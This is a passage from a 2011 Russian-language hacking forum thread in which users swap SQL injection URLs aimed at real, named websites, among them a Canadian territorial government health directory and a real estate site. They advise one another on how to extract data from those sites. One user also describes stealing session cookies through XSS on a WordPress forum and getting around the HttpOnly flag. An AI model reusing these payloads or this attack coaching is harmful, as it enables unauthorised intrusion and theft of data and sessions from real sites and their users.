HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17211  
Старый 07.06.2011, 18:39
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
Возникла трабла со скулёй
Не получается найти вывод. автоматические средства бессильны
Код:
Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+or+1=1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
У кого какие идеи ?
Читай проведение SQL инъекций в Microsoft Access:

/thread50550.html
 
Ответить с цитированием

  #17212  
Старый 07.06.2011, 19:00
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Читал, пробовал разные варианты

Код:
Code:
http://www.hlthss.gov.nt.ca/english/services/help_lines/help_directory_database/view_organization_detailed.asp?ID=148+and+1=-1+UniOn+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+MSysObjects
Не получается вывести диагностические ошибки о правильности или неправильности
 
Ответить с цитированием

  #17213  
Старый 08.06.2011, 02:37
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Всем привет!

Подскажите, по какой причине может передаваться не вся кука?

Всякий хлам из нее доходит, а вот ключа с сессией пользователя нет.

add:

На сайте wordpress 3.1.3... xss в форуме(плагин для wp).

Еще попробовал в адрессной строке просмотреть алертом... тоже самое... без нужного значения. Опера показывает все, и еще на нужной записи стоит флаг HttpOnly, на остальных нет.
 
Ответить с цитированием

  #17214  
Старый 08.06.2011, 02:56
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

IMMORTAL_S, сам ответил на вопрос. HttpOnly
 
Ответить с цитированием

  #17215  
Старый 08.06.2011, 03:06
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Да, уже погуглил.

Что-то еще можно сделать?.. как-то убрать этот флаг?

add:

нашел ява апплет... всем спасибо))
 
Ответить с цитированием

  #17216  
Старый 08.06.2011, 03:49
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
 
Ответить с цитированием

  #17217  
Старый 08.06.2011, 05:27
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:
cookiejacking - новый вид атаки, использующей зиродей в IE всех версий. В конце мая на HITB2011 был продемонстрирован.
спасибо, лови +

пока забил на куки... нашел sqlinj
 
Ответить с цитированием

  #17218  
Старый 08.06.2011, 11:37
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

В какую сторону раскручивать?

Код:
Code:
http://www.homesrochester.com/index.cfm?PageID=1
пробовал как mssql, не выходит
 
Ответить с цитированием

  #17219  
Старый 08.06.2011, 11:48
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от mix0x0  
mix0x0 said:
В какую сторону раскручивать?
Код:
Code:
http://www.homesrochester.com/index.cfm?PageID=1
пробовал как mssql, не выходит
Крутить нужно как проведение SQL инъекций в Microsoft Access:

/thread50550.html

но навряд ли ты ее раскрутишь
 
Ответить с цитированием

  #17220  
Старый 08.06.2011, 12:20
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

2mix0x0 там все просто, стоит Microsoft SQL Server 2005 почитай тут тут и тут

там 100500 БД...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ